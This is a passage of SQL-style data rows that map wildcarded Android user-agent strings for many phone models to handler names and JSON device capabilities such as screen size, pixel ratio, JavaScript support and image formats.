Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Bucare Y330-U05) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Bucare Y330-U05) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C1504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C1504) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C1505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C1505) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C1604) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C1605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C1904) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C1905) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C1905) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C2004) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C2005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C2104) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C2105) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C2304) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C2305) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C2305) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C5302) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C5303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C5303) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C5502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C5503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C6502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C6530N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C6602) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C6603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C6902) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; C6903) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CENTURION) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CHC-U01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CHC-U03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CHC-U23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CHM-U01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CHM-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CINK FIVE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CINK PEAX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CINK SLIM 2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CINK SLIM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CM990) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CUBE 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; CX_S500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Casper_VIA_V8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Chacer) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Che1-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Che2-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Che2-L12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Che2-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Coolpad 8297W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Coolpad A118) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_coolpad','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Cynus F6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Cynus T2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Cynus T5) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Cynus T6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2004) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2105) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2114) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2202) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2203) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2206) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2212) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2243) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2302) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2305) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2306) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2403) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D2533) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D5103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D5106) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D5303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D5306) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D5322) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D5503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D5803) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D6502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D6503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; D6603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DASH C MUSIC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DASH JR K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DASHJRTV) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DASH_JR_3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; DEXP Ixion M LTE 5\") AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 